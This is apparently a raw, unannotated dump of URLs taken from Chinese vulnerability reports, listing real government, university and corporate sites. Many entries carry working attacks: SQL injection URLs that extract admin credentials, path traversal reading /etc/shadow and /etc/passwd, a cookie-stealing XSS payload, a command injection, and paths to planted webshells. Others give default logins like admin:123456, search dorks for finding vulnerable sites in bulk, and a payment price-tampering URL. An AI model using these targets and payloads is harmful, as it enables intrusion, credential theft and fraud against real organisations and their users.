http://58.222.212.114:82/txgtxyweb/homepages/appinfo_list_page.aspx http://58.222.211.21/xhgtxyweb/homepages/appinfo_list_page.aspx http://58.222.195.110:8081/jyxyweb/homepages/appinfo_list_page.aspx http://www.dtxzfw.com/homepages/appinfo_list_page.aspx http://xygk.jingjiang.gov.cn/homepages/appinfo_list_page.aspx http://219.134.129.53/pantoschool/XT/Accounts/login2.aspx?ReturnUrl=%2fpantoschool%2f http://huodong.5sing.kugou.com/ http://yplsjg.smda.gov.cn/ http://117.27.230.221/ admin:123456,test:123456用户名密码 admin:123456登陆成功,以下是上传功能,可以上传shell进行内网测试(友情测试点到为止,我就不上传shell了) http://v.17173.com/live/网站的配置、修改域名、发布公告等等,具体功能如下 http://vip.gffunds.com.cn/projects http://vip.gffunds.com.cn/issues/32 http://ctags.cn/ http://ctags.cn/bi/ http://easyad.cig.com.cn/ http://easyad.cig.com.cn/sem/file/index?cid=71&customer=71 http://easyad.cig.com.cn/sem/file/index?cid=71&customer=71 http://easyad.cig.com.cn/sem/file/index?cid=71&customer=71 http://easyad.cig.com.cn/project/index http://easyad.cig.com.cn/index.php/project/index/detail?project=2740 http://wanxuem.jiaoyu.baidu.com/index.php/Home/Exchange/postsList/id/2131/type/2.html http://www.baidu.com/s?wd=区政府信息公开系统&pn=20&oq=区政府信息公开系统&ie=utf-8&rsv_page=1&f=8&rsv_bp=1&tn=baidu http://xinxigk.baodi.gov.cn/commonSearch.jsp?search=1 http://zfxxgk.bh.gov.cn/commonSearch.jsp?search=1 http://gk.tjnk.gov.cn/commonSearch.jsp?search=1 http://202.99.99.30/commonSearch.jsp?search=1 http://60.29.110.175/commonSearch.jsp?search=1 http://gk.xq.gov.cn/commonSearch.jsp?search=1 http://218.69.106.201:8080/commonSearch.jsp?search=1 http://gk.tjhqqzf.gov.cn/commonSearch.jsp?search=1 http://218.94.36.39:96/jstsh/jsp/xinxwh/user/queryMoreGongd.do?flag=1 www.taiheinfo.net http://dxks.ecupl.edu.cn/dxks/login.action http://58.68.237.38 jdbc:mysql://**.**.237.124:3306/a*****k http://211.95.193.67:80/ http://www.njude.com.cn/specls/cls/bbs/daoxue.asp?CourseID=09248A http://www.skynj.com/) inurl:homepages/content_page.aspx http://58.213.129.206:8080/jytweb/admin/sysconfig_reg_page.aspx http://58.222.184.133/tzxyweb/admin/sysconfig_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/admin/sysconfig_reg_page.aspx http://58.222.216.220/ggxygkweb/admin/sysconfig_reg_page.aspx http://58.222.202.135:82/admin/sysconfig_reg_page.aspx http://xygk.jingjiang.gov.cn/admin/sysconfig_reg_page.aspx http://58.222.212.114:82/txfgxyweb/admin/sysconfig_reg_page.aspx http://58.222.195.110:8081/jyxyweb/admin/sysconfig_reg_page.aspx http://58.222.212.114:82/txgtxyweb/admin/sysconfig_reg_page.aspx http://58.222.211.21/xhgtxyweb/admin/sysconfig_reg_page.aspx http://61.178.185.50/tzweb/admin/sysconfig_reg_page.aspx http://www.dtxzfw.com/admin/sysconfig_reg_page.aspx http://www.jseic.gov.cn:8081/jxwweb/admin/sysconfig_reg_page.aspx http://58.213.129.206:8080/jytweb/admin/sysconfig_reg_page.aspx http://58.222.184.133/tzxyweb/admin/sysconfig_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/admin/sysconfig_reg_page.aspx http://58.213.129.206:8080/jytweb/admin/effectdate_reg_page.aspx http://www.dtxzfw.com/admin/effectdate_reg_page.aspx http://www.jseic.gov.cn:8081/jxwweb/admin/effectdate_reg_page.aspx http://58.222.212.114:82/txfgxyweb/inc/frame.htm?url0=../developer_tools/webresource_list_left_page.aspx http://58.222.195.110:8081/jyxyweb/inc/frame.htm?url0=../developer_tools/webresource_list_left_page.aspx http://58.222.212.114:82/txgtxyweb/inc/frame.htm?url0=../developer_tools/webresource_list_left_page.aspx http://58.222.216.220/ggxygkweb/transdata/transdata_outtoin_page.aspx http://xygk.jingjiang.gov.cn/transdata/transdata_outtoin_page.aspx http://58.222.211.21/xhgtxyweb/transdata/transdata_intoout_page.aspx http://58.222.216.220/ggxygkweb/transdata/transdata_intoout_page.aspx http://xygk.jingjiang.gov.cn/admin/usr_page.aspx?q=%C2%97%C3%BF%C3%81%C2%AC%C3%9C%C3%A5%C2%82%C3%88%C2%98%C3%85%C2%9B%C2%98%C3%86 http://58.222.212.114:82/txfgxyweb/admin/usr_page.aspx?q=%C2%97%C3%BF%C3%81%C2%AC%C3%9C%C3%A5%C2%82%C3%88%C2%98%C3%85%C2%9B%C2%98%C3%86 http://58.222.216.220/ggxygkweb/inc/frame.htm?url0=../transdata/transtablesmapping_left_page.aspx http://58.222.184.133/tzxyweb/inc/frame.htm?url0=../transdata/transtablesmapping_left_page.aspx https://222.178.225.34/index.php http://58.22.191.175(无需登陆) http://hqwx.fjnu.edu.cn/Repair/system/login/login.php http://weixin.lenovo.com.cn/lenovo_admin_weixin/page/main.php http://weixin.lenovo.com.cn/valuation/index.php/EvaluationList/evaluation_list?username=1&page=0 http://weixin.lenovo.com.cn/valuation/index.php/Evaluat http://weixin.lenovo.com.cn/valuation/index.php/Evaluat http://www.motexiu.cn/a/2011missworld/picture.php?areaid=7 http://www.motexiu.cn/a/2011missworld/ http://sqlmap.org http://59.cn/icp/--- http://ispapi.dns-china.com:18080 http://122.206.110.3/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html# http://202.117.122.49/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://wsbgt.xaufe.edu.cn/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html# http://219.247.104.5/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://202.203.181.10:8260/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://mooc.dlteacher.com/ADKSVOD/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://125.219.33.235/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://ksvod.tedala.gov.cn/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://www.wsbgt.com:82/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://source.mastvu.ah.cn/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://211.81.31.35/adksvod/ADKSAdmin/GeneralAdmin/editor/filemanager/connectors/test.html http://zx.qcplay.com/Index/ http://zx.qcplay.com/News/detail/id/1670 http://verisign.itrus.com.cn/verisign.itrus.com.cn.zip http://qzgwj.com/gwjchen/ewebeditor/admin/login.php http://ls.gamefy.cn/ http://ls.gamefy.cn/detail.php?id=39 http://www.ytld.gov.cn/oa/default.asp IP:114.215.104.139 http://221.215.1.168/scopia/entry/index.jsp id:836565 PIN:123 http://i.maxthon.cn/域下,在控制台里进行) http://www.hmdz.gov.cn/view.asp?keyno=2431 http://rz-www.sd.cninfo.net/telecom/news.asp?id=43 http://www.lingzhansoft.com/dxal.asp http://jwc.nchu.edu.cn/teachweb/PreLogin.aspx http://fex.baidu.com/blog/2014/04/traffic-hijack-2/): https://bugzilla.camera360.com/show_bug.cgi?id=4818 https://bugzilla.camera360.com/buglist.cgi?product=%E4%BA%91%E7%9B%B8%E5%86%8C%EF%BC%8D%E7%A7%BB%E5%8A%A8%E7%AB%AF&component=%E4%BA%91%E7%9B%B8%E5%86%8C%E8%AE%BE%E7%BD%AE&resolution=--- http://open.lenovo.com/data/eventDefineAction.do?method=getHideEvent http://lenovobbs.lcf5.lenovo.com.cn/forum.php?mod=person_thread&uid=aa http://www.deyang12380.gov.cn/ReadView.asp?id=1498 http://www.deyang12380.gov.cn/loginAdmin.asp http://211.103.186.178:8080/ http://hao.lenovo.com/mps/api/safeNavList.php?cookieId=&pageName=1%27%20union%20all%20select%201%2C2%2C3%2C4%23 inurl:newsx.asp?id= http://59.53.91.235/hcs50/login.aspx http://www.jxjtzx.com:8088/ http://59.53.91.226/HCS/Login.aspx http://xt.jxyrgs.com/Login.aspx http://218.95.0.228:8089/Hcs50_CZ/login.aspx http://218.95.0.241/hcs50_cf/Login.aspx http://59.53.91.233:8080/Login.aspx http://redmine.peopleyuqing.com/projects http://www.wooyun.org/bugs/wooyun-2014-081868/trace/40964e232d0086aeea5d466dddd16277 http://118.186.218.208/ http://118.186.218.208/public http://118.186.218.208/it/maintain_api_doc/commits/master http://183.61.131.242/lichengdong/scripts http://183.61.131.242/lichengdong/scripts/blob/master/pw.txt https://play.google.com/store/apps/details?id=ctrip.english&hl=zh_CN http://mail.csztv.com/ http://www.114school.com/yxt/index.html http://115.236.101.52/weibo/theme/.svn/entries http://mail.zgmx.org.cn/ http://mail.jzbank.net/ http://admin.maxthon.cn/ http://www.haha.mx/ http://mail.stuln.com/ www.cofco.com www1.cofco.com www.cofco.com www1.cofco.com bt:/pentest/enumeration/dns/dnsenum# http://www.21wecan.com)存在两处SQL注入。 http://118.186.64.203/bdrs13part/query/queryAction.do?method=toQueryPage&uid=564 http://118.186.64.203 http://f.hismarttv.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://www.sitestar.cn/help/default.aspx?type=35&category_id=31 www.sitestar.cn http://gfwl.hisense.com/fullLogin.html http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3D&Encap=1X20 http://video.sxrb.com/administrator/index.php http://srm.hisense.com:8001/SRMWeb/ http://srm.hisense.com:8001/SRMWeb/PreVendor/PreVendorRegist.aspx?Action=New http://srm.hisense.com:8001/SRMWeb/UploadFile/WebHtmlEditorFile/77.asp;.jpg http://srm.hisense.com:8001/SRMWeb/InnerPortal/noticeview.aspx?noticeid=1188 com:8001 inurl:distribution_showLogisticPage.do?orderNumber= http://www.haixindichan.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://map.ctrip.com http://map.ctrip.com/ctrip/sendmail.jsp http://www.cxw.zjut.edu.cn|dedecms|admin http://www.tw.zjut.edu.cn|dedecms|admin http://www.szb.zjut.edu.cn|dedecms|admin http://kczy.zjut.edu.cn/gene/info_Print.asp?ArticleID=265 http://kczy.zjut.edu.cn/gene/info_Print.asp?ArticleID=265 http://跳转到一些特权域,比如mx://(会提示无法访问本地资源),这使得我们想在特权域下执行XSS来实现命令执行变得困难。 mx://res/notification/saved/index.htm http://58.215.142.39/uums/login/index.action http://58.215.142.39/uums/baobao.jsp http://hotdiamond.cn/news.asp?id=1 TOP100SUMMIT:2014年全球软件案例研究峰会存在注入点可脱裤 inurl:hn_type.asp?id= http://www.sxsimo.com/hn_type.asp?id=47 http://www.xyrip.com/hn_type.asp?id=30 http://www.sxshsy.com/hn_type.asp?id=30 http://www.gmjx.net/hn_type.asp?id=30 http://www.cgjgroup.com/hn_type.asp?id=32 http://www.xyqinxu.com/hn_type.asp?id=30 http://www.xyredcross.org/hn_type.asp?id=79 http://www.hongyefc.com/hn_type.asp?id=33 http://www.bogocorp.cn/hn_type.asp?id=192 http://www.hengtongfrp.com/hn_type.asp?id=30 http://www.029hwx.com/hn_type.asp?id=31 http://www.hnrhzy.com/hn_type.asp?id=47 http://hshjf.com/hn_type.asp?id=30 http://www.sxhaoyao.com/hn_type.asp?id=33 http://www.sxkaize.cn/hn_type.asp?id=34 http://www.sxxfn.com/hn_type.asp?id=31 http://www.xyhaian.com/hn_type.asp?id=34 http://www.sxyf.cn/hn_type.asp?id=30 http://www.yangjiayijue.com/hn_type.asp?id=31 http://goodcat.com.cn/hn_type.asp?id=30 http://www.029ndt.com/hn_type.asp?id=30 http://www.xyzqjzlw.com/hn_type.asp?id=30 http://219.143.18.106/desktop.html https://219.143.18.117/desktop.html(中国电信云计算分公司) http://update.hicloud.com:8180/TDS/data/files/p3/s15/G639/g272/v18037/f1/full/filelist.xml http://update.hicloud.com:8180/TDS/data/files/p3/s15/G639/g272/v18037/f1/full/changelog.xml http://hf.jjbctv.com/webusr/webuser_reg_page.aspx http://221.226.86.69:8011/webuser/webuser_reg_page.aspx http://58.222.211.21/xhweb/webusr/webuser_reg_page.aspx http://www.jseic.gov.cn:8081/jxwweb/webusr/webuser_reg_page.aspx http://61.178.185.50/lzweb/webusr/webuser_reg_page.aspx http://58.213.129.206:8080/jytweb/webusr/webuser_reg_page.aspx http://zwdt.njlh.gov.cn/webuser/webuser_reg_page.aspx http://qlyg.jiangsudoc.gov.cn/webuser/webuser_reg_page.aspx hisensephone.com/interface/alipay/alipayto.aspx?id=191&price=1099.00 hisensephone.com/interface/alipay/alipayto.aspx?id=191&price=0.01 www.zhongmin.cn)于2008年正式上线运营,是经中国保监会批准的大型保险电子商务网站,由中民保险经纪股份有限公司和中民电子商务股份有限公司共同建设与运营。中民保险经纪股份有限公司是经保监会审核批准的全国性、综合性保险经纪公司,公司注册资本5000万元人民币。2012月1月,中民保险网首批获得中国保监会批复的互联网保险业务经营资格。 https://login.zhongmin.cn/Register.aspx https://login.zhongmin.cn/FindPwd.aspx http://www.guanghan.gov.cn/admin_manage/ http://www.guanghan.gov.cn/login_szxx.asp http://www.guanghan.gov.cn/user_manage/user_index.asp http://cyjwb.jmu.edu.cn/new_view.asp?id=793 http://zb.yctc.edu.cn/EC_Usercenter.asp?action=Userinfo&id=3251 http://zb.yctc.edu.cn/EC_Usercenter.asp?action=Userinfo&id=(id后面跟2到3251都可) http://www.tipask.com/ http://www.shaolin.org.cn/console/nodemanage/node_modify.aspx http://www.minjiao.com/ http://web.ptjy.com/web/web_programs_dotnet/member/ http://www.zzyxjy.com/Web/Web_Programs_DotNet/Member/ http://school.mwedu.gov.cn/web/web_programs_dotnet/Member/ http://school.gledu.gov.cn/web/web_programs_dotnet/Member/ http://school.zzlwjy.com/web/web_programs_dotnet/member/ http://school.fjhajy.net/web/web_programs_dotnet/member/ http://schoolweb.ctjy.net/web/web_programs_dotnet/member/ http://school.fjjyjy.net/web/web_programs_dotnet/member/ http://www.ptedu.gov.cn/web/web_programs_dotnet/member/ www.qledu.gov.cn/web/web_programs_dotnet/Member/ www.mscas.ac.cn:1005/Gplugin/login.asp http://www.haixindichan.com/haixindichan.rar http://www.suyaxing.com/ Google:inurl:/vodweb/affiche.asp http://vod.ahlib.com/vod2005/vodweb/affiche.asp http://www.178.com/账号 http://112.53.127.12:8082/admin/login/vexist.action等等 http://sup.hisense-plaza.com/scmsup/default0.aspx http://sup.hisense-plaza.com/scmsup/MaintnPasswd.aspx http://sup.hisense-plaza.com/scmsup/MaintnPasswd.aspx http://dev.anzhuoapk.com/application/application/input?app_id=30001 http://**.**.**/Login.aspx http://10035.suning.com/mysnnet/login.htm http://v2.hisense.com:18080/Conf/jsp/main/mainAction.do http://www.wuxianled.com http://www.wuxianytk.com/webled3/index.action http://gf.hisense.grirms.com/forget_password.php?submit=true http://www.lingzhansoft.com/Products_view.asp?id=5836&tid=257 http://210.47.0.218/education/viewstudent.aspx?studentid=s000022716 http://210.47.0.218/education/viewstudent.aspx?studentid=s000022717 http://210.47.0.218/education/tutordetails.aspx?innercode=t000000088 http://www.kelonfc.com/cn/product.asp?bid=10&menu=2 http://www.kelonfc.com/cn/pshow.asp?pid=5&bid=10&sid=0&menu=2 http://www.kelonfc.com/cn/about.asp?aid=9&menu=4 http://paichu.cscse.edu.cn/OSVisa/register/login.action http://drops.wooyun.org/tips/3296 http://shop.hisense.com http://newshop.hisense.com http://shop.hisense.com http://newshop.hisense.com http://newshop.hisense.com/customer/addresses http://newshop.hisense.com http://newshop.hisense.com/orderdetails/10034 http://shop.hisense.com http://shop.hisense.com http://shop.hisense.com/Ucenter/My/pageInvoice http://111.***.**.119/ http://jikan.com.cn也是社会科学文献出版社,并且和主站在同一台服务器上,数据库也是同一台 http://jikan.com.cn http://jikan.com.cn/Web/ http://jikan.com.cn/bin/ http://jikan.com.cn/member/ http://jikan.com.cn/temp/ http://jikan.com.cn/files/ http://jikan.com.cn/admin/config/ http://jikan.com.cn//admin/insertweb/ http://jikan.com.cn/ceshi/ http://jikan.com.cn/controls/ http://jikan.com.cn/aaa/ http://jikan.com.cn/API/ http://jikan.com.cn/api/log.txt http://jikan.com.cn/config/ http://jikan.com.cn/logs/ http://jikan.com.cn/api/log.txt http://jikan.com.cn/admin/Log/LoginLog/14-11-04_LogMessages.xml http://jikan.com.cn/config/ConnectionStrings.rar http://sjs.baic.gov.cn/Manage/index.php,使用2#中得到的用户名密码登陆 http://sjs.baic.gov.cn/test78.php http://midh.marketviewrc.com/users/# http://211.101.142.244:8080/ http://211.101.142.244/ http://gzsc.gzlm.net/ https://www.huoqiu.cn/mobile/login/phone/is_exist.json?phoneNum=13800138000&md5str=e2009584715d2bc28ec13251867ea066&csrf_time=1415197219841&hq_phone=true https://www.huoqiu.cn/mobile/app/login_pwd/reset.json?cell=1338116****&password=123456&passwordRepeated=123456&md5str=dc17b75b4ab7ad5273dcf1396fbaeee3&csrf_time=1415195091957&hq_phone=true https://www.huoqiu.cn/mobile/app/login_pwd/reset.json?cell=1338*******&password=123456&passwordRepeated=123456&md5str=dc17b75b4ab7ad5273dcf1396fbaeee3&csrf_time=1415195091957&hq_phone=true http://aec.sdu.edu.cn/dede/index.php,使用2#中得到的用户名密码登陆 http://aec.sdu.edu.cn/uploads/test78.php http://wooyun.org/bugs/wooyun-2010-047226 http://jikan.com.cn/skwx/periodical/Period_annualCont.aspx?qik_id=20130527175642 http://jikan.com.cn/XinJK/XinSearchAll.aspx?con=3¤t=2&titleText=%27AND+1%3d%28CHAR%2895%29%2bCHAR%2833%29%2bCHAR%2864%29%2bCHAR%2850%29%2bCHAR%28100%29%2bCHAR%28105%29%2bCHAR%28108%29%2bCHAR%28101%29%2bCHAR%28109%29%2bCHAR%28109%29%2bCHAR%2897%29%29%2b%27 http://jikan.com.cn/XinJK/XinSearchAll.aspx?titleText=%27AND+1%3d%28CHAR%2895%29%2bCHAR%2833%29%2bCHAR%2864%29%2bCHAR%2850%29%2bCHAR%28100%29%2bCHAR%28105%29%2bCHAR%28108%29%2bCHAR%28101%29%2bCHAR%28109%29%2bCHAR%28109%29%2bCHAR%2897%29%29%2b%27 http://bang.liba.com/decorate/guide/10/32/1/list?z=1&source=tag http://brand.liba.com/details.php?groupId=010205257&eventId=83&reportId=513&obj=report http://www.jdbbx.com/ http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 http://mogu.jdbbx.com/SearchPlugList.aspx?keyword=1 http://202.98.11.30/admin.asp https://www.huoqiu.cn/asks/831.html http://www.sgsg.samsung.com/forum/qna.do?pageNo=1&searchQry=123 http://club.mingdao.com/thread-1633-1-1.html http://me.kesion.com/ http://cms.phbs.pku.edu.cn/ http://cms.phbs.pku.edu.cn/platform/users/7e4c97f293b2803128e8286bc46c85d5/1.asp;.jpg http://cms.phbs.pku.edu.cn/phpinfo.php http://219.232.241.14/ http://219.232.241.14:8090/hudson/ http://219.232.241.14/redmine/ http://www.coolyi.net/khal/ inurl:detail.asp http://www.hbfhxl.com/detail.asp?unid=233 http://www.sjzjm.com/detail.asp?unid=1279 http://drops.wooyun.org/papers/3451 http://www.efunds.com.cn/ http://111.1.15.86/ http://wzcard.com.cn/的app端 http://111.1.15.86/ECoupon.aspx?goodId=7801&qty=1 http://111.1.15.86/ECoupon.aspx?goodId=7801&qty=1 http://111.1.15.86/ECoupon.aspx?goodId=7801&qty=1 http://scm.17ugo.com/ http://10.0.4.20/newproduct/webservice.php?wsdl http://192.168.255.142:8090/UgoSCMWebService/services/SCMWebService?wsdl http://www.gyfy.gov.cn/Easypower/login.asp http://www.haitiansoft.com:8080/ https://www.huoqiu.cn/asks/831.html https://www.huoqiu.cn/asks/index.html https://www.huoqiu.cn/group/65.html http://www.xcfdc.cn/newsclass090506.php?ibelongid=7&iitypeid=51 http://www.zcwmfw.com/web/zwdt/bgxz.jsp?id=904 http://zwdt.szciqic.net/zw/external/notice!getNoticeInfo.action?id=1718496 http://zwdt.szciqic.net/zw/external/notice!getNoticeInfo.action?id=1718496 http://www.ssapchina.com/api/log.txt http://www.ssapchina.com/admin/ckfinder/ckfinder.html?action=js&f http://www.wooyun.org www.wooyun.org http://bsdt.nantong.gov.cn/riseapprove_web/bmsltxDetail.do tel:10086 http://test.m4sk.net/phone.html http://220.167.53.63:8023/zfca/ http://www.masok.cn/ http://tuan.masok.cn/index.php?m=Rss&a=index&cityname=maanshan http://xjb.nea.gov.cn/ http://xjb.nea.gov.cn/fckeditor/editor/filemanager/upload/test.html http://xjb.nea.gov.cn/UserFiles/1.aspx http://coastalbank.cn/bill.php?id=21 http://74.125.227.77/#newwindow=1&q=inurl:AuthorVideo.aspx%3FAuthorID&btnK=Google+%E6%90%9C%E7%B4%A2 http://shanghai.com.cn/pay_des.php?id=20 http://www.ilas.com.cn/ http://www.ilas.com.cn/ProductsView.Asp?Id=3 http://www.haitiansoft.com:8080/ http://223.202.68.28/WorldCup/match.asmx?op=Match_Get_ByDate http://www.3m4.net/admin/login.php http://yulin.0912007.com/admin/login.php http://www.cwen.org/114//admin/login.php http://www.puerquan.com/daohang//admin/login.php http://www.dm566.com//admin/login.php http://95880.net//admin/login.php http://hao.56lem.com/admin/login.php http://daoh.22web.org/admin/login.php http://www.114diy.cn/admin/login.php http://56114.com.cn/admin/login.php https://58.63.228.156/login.php https://58.63.228.154/login.php http://www.zmjsjt.cn/index.htm http://www.sdwhys.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.zjnksyzx.com:8801/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.lcxyz.com:21245/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.suyaxing.com:81/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.hwsyxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.dlwsxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 url:http://xiage.yy.com/forum.php?mod=viewthread&tid=97973&page=1&extra=#pid882005 http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash][media=x,500,375 http://drops.wooyun.org/papers/3771 http://123.sogou.com/x/2012zqj/winner_list.php?callback=12345||calc http://shop.hisense.com/fp/index.html https://202.97.141.102/welcome.php inurl:/kdgs/biz/ http://www.hanchuan.gov.cn:8080/kdgs/ http://gk.sxgp.gov.cn:8080/kdgs/ http://fwzx.bazhou.gov.cn/kdgs/ http://222.163.238.198:8080/kdgs/ http://gk.sxgaoping.gov.cn:8080/kdgs/ http://gk.sxgp.gov.cn:8080/kdgs/这个站来演示。 http://gk.sxgp.gov.cn:8080/kdgs/portal/filedownload/download.action?filename=web.xml&webPath=%2FWEB-INF%2F http://gk.sxgp.gov.cn:8080/kdgs/portal/filedownload/download.action?filename=proxool.properties&webPath=%2FWEB-INF%2Fclasses%2F http://www.hanchuan.gov.cn:8080/kdgs/portal/filedownload/download.action?filename=proxool.properties&webPath=%2FWEB-INF%2Fclasses%2F http://gk.sxgp.gov.cn:8080/kdgs/core/user/userlist.jsp http://www.hanchuan.gov.cn:8080/kdgs/core/user/userlist.jsp http://122.225.104.101:8080/default.jsp以后是超级用户.下面用户名用第一个.密码123456 gy.evergrande.com/ObjectHouseInfo.aspx?ID=13 gy.evergrande.com/newslist.aspx?c=1703 http://www.edu025.net/) inurl:/webSchool/read.aspx?ID= http://hxxx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://za6z.zajyj.cn/webSchool/list.aspx?keyWords=1 http://spxx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://mtxx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://jzzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://zyzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://ljzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://yanxi.zajyj.cn/webSchool/list.aspx?keyWords=1 http://rxzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://glzx.zajyj.cn/webSchool/list.aspx?keyWords=1 http://www.teldlc.com/new/lynew.php?ID=900 http://www.teldlc.com/adm/login.php直接登陆后台 http://chinapost.ajonecod.com/Notice/ContentPage.aspx?ID=24 url:http://www.abcd.edu.cn/ url:http://www.abcd.edu.cn/admin/login.asp http://www.bjeea.cn/data/admin/ver.txt http://www.hisensehitachi.com/web.rar http://210.14.64.203:8080/ http://210.14.64.203:8080/docs/funcspecs/1.jsp https://cas.ruc.edu.cn/cas/login http://portal.ruc.edu.cn http://partner.locknlock.com.cn http://partner.locknlock.com.cn/test.txt http://open.lenovo.com/developer/servlet/FileDownloadServlet?fileName=../../../../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././shadow http://ts.locknlock.com.cn/commonAction!mobileLogin.action http://gjsx.js118114.com:80/ui/pages/company/publicInfo.aspx?id=161-0 http://smtp.pipi.cn/www.1778.net/getNewsById.do?id=24&action=control http://smtp.pipi.cn/www.1778.net/images/news/xxxx.jpg.jsp http://www.gb163.com/ http://yonyou.com/en/login.html http://www.hr135.com/index.php?m=register&usertype=2 text-align:left http://221.178.251.183/ http://221.178.251.183/appCenter/loginAppInfo.action http://221.178.251.183/cmBusiManage/openBusi/showCMBusiImage.action?busi.picPath=../../../../../../../../../../etc/passwd mobileservice2.asmx/GetLearningBooks http://www.thermos.com.cn/food.php?curr_page=food_teaism_detail&id=30 http://business.nenu.edu.cn//sxyadmin/,使用2#中得到的用户名密码登陆 http://tzb.nenu.edu.cn/index.html部分源码如下 http://business.nenu.edu.cn/test78.php www.cic.cn http://xyspks.sxszb.com/XYKS/ http://www.kugou.com/musicshow/app/index.php?a=ge http://sqlmap.org http://wooyun.org/bugs/wooyun-2014-076599 http://wooyun.org/bugs/wooyun-2014-065798 http://www.wooyun.org/upload/201406/2200365508b60b3ab3a1604569c50fabd6b448f1.jpg http://www.baidu.com/s?wd=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&pn=50&oq=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&ie=utf-8&rsv_pq=bf3e63ef00016d7a&rsv_t=7c9aDgkEFKzDMR0WdiRIc8zStNMuWUt5eZkDVjpK8DDhOOqWH8Hi&rsv_page=1&f=8&rsv_bp=1&tn=baidu http://sportingbus.com/ http://fjzhyz.cn/ http://www.scyahyez.com/ http://jwculture.com/ http://183.167.250.28:85/ www.scyahyez.com http://www.scyahyez.com http://www.ftchinese.com http://www.mycodes.net/25/2089.htm http://www.pcfinal.cn/ http://www.wangluojiaoshi.com/admin/cms_login.asp http://www.tjtongxun.com/admin/cms_login.asp http://www.rj-bz.com/admin/cms_login.asp http://www.jlsty.com/admin/cms_login.asp http://www.texcrew.com/admin/cms_login.asp http://www.51yyc.com/admin/cms_login.asp http://www.baigonghuashi.cn/admin/cms_login.asp http://www.cqxhy.com/admin/cms_login.asp http://www.hd9168.com/admin/cms_login.asp http://www.86229222.com/admin/cms_login.asp http://www.wxftdz.com/admin/cms_login.asp http://**.**.**/login.jsp http://im.wo.cn:80/webportal/loginSp/userLogin.action http://210.14.64.201:8080/jmx-console/ http://jwxt.snnu.edu.cn/urp.zip http://42.99.16.28/login!login.do http://hblm.locknlock.com.cn/web/user/register.jsp http://hblm.locknlock.com.cn/lib/userphoto/e022da1b-a221-4113-9d7b-74b61b53aa0b.jsp http://hblm.locknlock.com.cn/lib/userphoto/c8dced8e-a2d5-49b7-89c2-8a8df1f5f3a2.jsp www.517hanguo.com http://www.517hanguo.com/article/listinfo.aspx?channel=101&id=189 http://59.151.25.14/ http://59.151.25.14/booking/showdate.php?oid=360 http://docsys.sharp.cn:8006/dealer/system/login.jsp http://docsys.sharp.cn:8006/dealer/system/news/editNew.jsp?newsID=128&page=1&keyword=0&searchType=0 http://210.75.218.69:7001/uams/ http://210.75.218.69:7001/tickProxy/1ndex.jsp http://ztb.epoint.com.cn:8090/bzbpb5_demo/login.aspx https://www.jointforce.com/ https://www.jointforce.com/jfprofile?lt=NDA1Ozs7O0RFVjs7OzsxNDE1MzM5Njk3MDgw http://eps.hikvision.com/custom/ http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://eps.hikvision.com/custom/SuperMarket/Index_ItemList.aspx?1=1&keyWord=1 http://222.82.245.150:808/zhyw/login.action http://www.qqhrstats.gov.cn//Admin_Set.asp http://www.fjxrkj.com/ inurl:newsView.asp?id= inurl:Productview.asp?id= inurl:newsView.asp?id= http://www.pzhivd.com/newsview.asp?sid=1&id=2 http://ecsld.com/newsview.asp?sid=2&id=3 http://www.zhfarm.com/newsView.asp?id=325 http://www.xmtfsw.com/newsView.asp?id=332 